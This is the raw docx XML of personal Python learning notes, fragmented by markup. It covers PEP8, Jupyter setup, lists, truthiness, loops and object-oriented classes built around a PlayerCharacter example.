      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -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int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birth_year</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645773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'Your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age is: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1FBF32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AC7F3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998CBC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5CE5B9F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br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PEP8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689DC3C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February 3, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D253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5:53 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0139094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hyperlink r:id="rId79" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://peps.python.org/pep-0008/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04264E1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C8E01D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EE9CA1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9FADE4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82EF2E2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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Jupyter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Notebooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28A9D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February 3, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F073EA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5:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FB0E9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hyperlink r:id="rId80" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://problemsolvingwithpython.com/01-Orientation/01.03-Installing-Anaconda-on-Windows/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="416C929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D40D13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Anaconda Navigator download:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA64E4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hyperlink r:id="rId81" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://www.anaconda.com/download</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19167914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BDF1BB1" wp14:editId="793619DB">
            <wp:extent cx="4000500" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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A1F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4659FA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9AAAD7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3CDD2B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A18EB68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br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00233C26">
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790BA81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February 3, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3CFDE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6:21 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E58EE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basket = ['a', 'x', 'b', 'c', 'd', 'e', 'd']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA8747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basket.sort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F898BD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basket.reverse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC6AC4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2CC966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This creates a new list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB1FEF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print(basket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[::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-1])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308F7A5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B552AF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D5DBA3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FBCC4B0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truthy vs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>falsy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37D27A7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8, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B0071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2:06 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D90A5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B8AEE7B" wp14:editId="0BEBAB32">
            <wp:extent cx="5029200" cy="4254500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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2CAC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1D92C8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38DE56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5A74AC8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proofErr w:type="spellStart"/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tenary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DECD6B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8, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6B4B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2:07 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F1F08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B134DB7" wp14:editId="5E995A4B">
            <wp:extent cx="5029200" cy="1778000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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2DE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EAADE8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C27364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75966C2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short-circuiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC7DFC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8, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE134E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2:07 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B6762E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C29CFFB" wp14:editId="2B1C96C5">
            <wp:extent cx="4737100" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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07F6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484713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7F7A91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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331F937B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logical operators if elf else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D69964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8, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B6C4E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2:06 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADE5EF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2D0BB18" wp14:editId="1CA62BB0">
            <wp:extent cx="4902200" cy="2959100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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C4E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34001B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98FC89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C0F185B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is vs ==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A262A4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8, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FFF9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2:05 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D26FC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DE6B99C" wp14:editId="076B68C5">
            <wp:extent cx="3822700" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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775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B5971F2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E9F11E7" wp14:editId="777E9791">
            <wp:extent cx="4787900" cy="1841500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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231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5D0CCFA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E898EE9" wp14:editId="0E3C5671">
            <wp:extent cx="4914900" cy="2692400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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46A9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F88E4B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1BA0DA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9A99D3A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for loops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B01755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8, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF581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2:08 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2F06D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BCCDFB4" wp14:editId="3DAECE23">
            <wp:extent cx="3606800" cy="1333500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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E546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869905E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626F512" wp14:editId="4F94A401">
            <wp:extent cx="1435100" cy="2781300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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5DE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2228AFB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464ACEE" wp14:editId="754AF5E2">
            <wp:extent cx="2540000" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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9DE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DC82472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7C7CD9F" wp14:editId="2728239B">
            <wp:extent cx="2654300" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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037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73145E6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9EAB8CA" wp14:editId="4CC00229">
            <wp:extent cx="3517900" cy="965200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="38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3559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07047B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D1FC47E" wp14:editId="46C221AA">
            <wp:extent cx="1346200" cy="2159000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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A3D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5F27CE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2AE6A0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8278783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proofErr w:type="spellStart"/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iterable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F8659B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8, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202BE8D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2:19 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F905E84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0925565" wp14:editId="28E2C6FB">
            <wp:extent cx="4394200" cy="2578100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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C2B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CE8113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DE929B1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EF84302" wp14:editId="352F6391">
            <wp:extent cx="4864100" cy="1651000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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16CDB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60B8239" wp14:editId="328FA8AA">
            <wp:extent cx="3429000" cy="711200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42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C34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EF5841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BD82AA8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C464112" wp14:editId="3E3B3C09">
            <wp:extent cx="4064000" cy="1651000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43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96EDC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17AFFB6" wp14:editId="66B0A5CF">
            <wp:extent cx="2692400" cy="711200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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C31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04A01D8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99B6C3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1D5D4FD" wp14:editId="2358A43C">
            <wp:extent cx="4191000" cy="1663700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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0DD6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AA15FBA" wp14:editId="3BE21273">
            <wp:extent cx="2806700" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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B10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DC3E45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F1B70B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# Dictionary unpacking (HashMap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destructuring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5ABFDC2B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AEAA23D" wp14:editId="465EDD8B">
            <wp:extent cx="4851400" cy="2921000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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E4699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066002D" wp14:editId="2421A0A8">
            <wp:extent cx="3416300" cy="1816100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="48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216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E9C46F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391D0C7F" wp14:editId="2A753835">
            <wp:extent cx="3302000" cy="1016000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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1C9D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44A009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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0604C05A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OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F53F1F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9, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5276968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3:55 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A88C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9DED15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B1AD462" w14:textId="77777777" w:rsidR="008725FA" w:rsidRDefault="008725FA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3411477A" w14:textId="175C4DA1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class.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EFE37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9, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF7404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3:57 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E68AB2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class.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B7B3E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C33E59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OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFAE90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BigObject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6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCAAD5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pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036825B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obj1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BigObject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() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri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instanciate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D7AB74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'type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(None):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7B7A0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None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7D6705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'type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(True):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7B7A0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8A1A1D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'type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(5):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7B7A0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BCB5B5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'type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(5.5):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7B7A0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5.5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37C4AD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'type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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">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7B7A0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'hi'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250B88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'type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([]):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7B7A0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([])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DC5094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'type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(()):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7B7A0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(())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B0300D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#print(f'type({}): {type({})}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D44A43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'type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(obj1):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7B7A0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obj1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D5C462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FBB874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DFA1B73" wp14:editId="2EFBEE95">
            <wp:extent cx="3302000" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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0312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9C9838C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1FCA1E0" wp14:editId="23DAB664">
            <wp:extent cx="4635500" cy="1651000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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736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F00966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495DE2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47889FB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creating-project.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52602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9, 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263F059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3:57 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC65AC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creating-project.py:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06948358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A7F89A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OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D0BED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835D23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03CD48F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__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init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__ is called whenever we instantiate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575EBA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self refers to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PlayerCharacter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47DF168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__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init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__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>):    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470FCC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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F660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71998F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run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6C0E430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'run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A2F253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Instantiate player1 using class    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB35A3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'player1'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498C27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'player1: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3699BB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587635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'player1.name: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5FAF2B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73E6F30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893CDA8" wp14:editId="794569C3">
            <wp:extent cx="4102100" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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3EF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F481185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6F765D5" wp14:editId="0C0A904C">
            <wp:extent cx="3771900" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"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175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BECA1B2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C404EF6" w14:textId="77777777" w:rsidR="008725FA" w:rsidRDefault="008725FA">
      <w:pPr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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3003FBA3" w14:textId="07EC3881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lastRenderedPageBreak/>
        <w:t># OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D96B1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66EF1BA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7E042FD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__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init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__ is called whenever we instantiate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ABBC4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self refers to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PlayerCharacter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34627E4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__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init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__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>):    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41925FA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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276B701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5FB7081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run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0BBDC12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'run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9A8DA5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Instantiate player1 using class    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD83F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'Player1'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04C695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'player1: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E71AA1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997D1E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'player1.name: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05C940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'Player2'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AA8068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'player2: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player2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B0FE43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BB2735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'player2.name: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7FF78F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D17E71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C4E6717" wp14:editId="36D588AA">
            <wp:extent cx="3771900" cy="1803400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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8A8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8BDA0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637143C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38E8BB26" wp14:editId="53606F07">
            <wp:extent cx="4140200" cy="4775200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5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FA5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04C74F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59051A9" wp14:editId="7C998C5E">
            <wp:extent cx="3797300" cy="2806700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56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EF6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1303C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Using Decorators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183EBF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@classmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFF347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@staticmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058BE697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6319D4E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OOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710A1FB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from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colorama</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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Back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Style</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6EF82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833FAF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3D2FB20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Class Object Attribute =&gt;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self.attribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69CE217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NOT change across objects built with same Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5D6E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membership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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372102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09E2261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__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init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__ = class Constructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DB571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similar to constructor(attr1, attr2) { super(attr1) } in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javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="50A8929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__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init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__ is called whenever we instantiate a Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0CECD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self refers to this Class itself as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PlayerCharacter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="00E6FE9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self. = this. in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javascript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38C11AA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__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init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="989875"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>__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'anonymous'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):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63285CE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name='anonymous', age=0 =&gt; default values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E81B06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705899F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Instantiating only if age &gt; 18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12173D9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 &gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>18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20A2D82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name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224ADAC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age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9091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C586C0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>elif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519ECC0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'Failed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to instantiate this Class with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name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age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405775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'Please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check whether you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="AB9464"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ve provided age'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0BF2B4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70ED10B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14:paraId="51A85F4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If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this.membership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= True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435B21C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membership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1A2C592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 xml:space="preserve">name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># attributes / properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32647F3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 xml:space="preserve">age </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t># attributes / properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547213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76C059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run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hello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461E3F3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hello</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>} {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is running :D'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16C6CB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CB8F76"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'done'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0793576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3A8C3F9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shout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316F65E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'My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name is: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9A5530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766EA33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Decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D78118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to write a function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524549D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using @classmethod =&gt; you'll have access to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cls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(Class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DFF1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@classmethod is commonly used when we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wanna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track &amp; change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9EF9B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Class.Attributes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=&gt; self.name,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self.age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etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF4A8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@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>classmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443A335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adding_things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07CF9F5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431FA7B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Instantiate an Object using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cls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(name, age)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3070ECC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# player1.adding_things(): &lt;__main__.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object at 0x0000019E072F5E50&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77390A2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'Teddy'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2465A6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4007B12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except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TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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02252AA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'TypeError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6E1DC3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01CA603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Decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD9B88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to write a function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A88123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using @staticmethod =&gt; you'll NOT have access to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cls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(Class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5130BC2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@staticmethod is commonly used when we do NOT care</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AEDF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about Class States =&gt; self.name,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self.age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etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA18A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using @staticmethod when NOT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gonna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change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self.attributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54205A9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@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>staticmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78412FB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adding_things2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77D09B4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18E0FEB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# when using @staticmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9917F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cannot be used to access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cls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(Class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3A066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</w:p>
    <w:p w14:paraId="0314477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except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TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="47B7A0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C06032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'TypeError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DB4037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0DF5558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Instantiating player1 using class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PlayerCharacter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17DEF47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with default values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F55133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'Player1'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20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DCF996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#help(player1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CA52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'player1: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198FE3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'player1.name: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</w:p>
    <w:p w14:paraId="555C980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'player1.age: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C4076C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019289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'player1.run():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run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"OMG!"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036746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41C8DE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'Player2'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24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67D964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player2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.attack = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA680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'player1.membership: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membership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375864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'player2.membership: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membership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EADDC7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EEF866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'player1.shout():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shout</w:t>
      </w:r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60376F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'player2.shout():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shout</w:t>
      </w:r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DF84E2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#print(f'player2:\n{player2}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DA24D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#print(f'player2.name: {player2.name}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C38E9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#print(f'player2.age: {player2.age}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69420BD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#print(f'player2.attack: {player2.attack}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CC76B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FF43B3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player3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47900E1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player3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="979797"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.attack = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Calibri"/>
          <w:color w:val="899C7F"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
